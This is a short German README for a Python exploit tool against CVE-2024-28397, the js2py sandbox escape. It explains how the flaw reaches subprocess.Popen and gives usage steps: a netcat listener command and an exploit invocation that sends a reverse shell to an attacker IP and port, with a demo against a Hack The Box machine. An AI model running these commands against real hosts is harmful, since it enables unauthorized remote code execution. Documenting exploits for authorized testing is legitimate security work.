
Ein Python-Automatisierungsskript zur Ausnutzung der Schwachstelle **js2py Sandbox Escape** (CVE-2024-28397). Dieses Tool automatisiert die Generierung und Zustellung von Payloads, um Remote Code Execution (RCE) auf verwundbaren Instanzen zu erreichen.
Ein Python-Automatisierungsskript zur Ausnutzung der js2py-Sandbox-Escape-Schwachstelle (CVE-2024-28397). Dieses Tool automatisiert die Generierung und Zustellung von Payloads, um Remote Code Execution (RCE) auf verwundbaren Instanzen zu erreichen.
⚠️ Rechtlicher Hinweis Die Verwendung dieses Tools zum Angriff auf Ziele ohne vorherige gegenseitige Zustimmung ist illegal. Dieses Repository dient ausschließlich zu Bildungszwecken. Der Autor ist nicht verantwortlich für jeglichen Missbrauch dieser Informationen. Dieses Tool ist für den Einsatz in autorisierten Sicherheitsbewertungen und Capture-The-Flag-Umgebungen (CTF) vorgesehen.
CVE-2024-28397 betrifft die js2py-Bibliothek (Versionen < 0.74). Die Bibliothek isoliert die JavaScript-Umgebung nicht ordnungsgemäß von der Python-Hostumgebung.
__class__- und __subclasses__-Attribute von Python.subprocess.Popen zuzugreifen, was die Ausführung beliebiger Befehle auf dem Host-Server ermöglicht.pip install requests
Starten Sie Ihren Netcat-Listener :
nc -lvnp 1337
Führen Sie das Skript aus :
python3 exploit.py -u <target url> -i <attacker ip> -p <attacker port>
Hier ist das Tool in Aktion gegen ein verwundbares Ziel (Hack The Box - CodeTwo):
Ausführen des Exploits, um den Payload zu generieren und den Callback auszulösen:

Empfangen der Reverse Shell auf dem Listener:
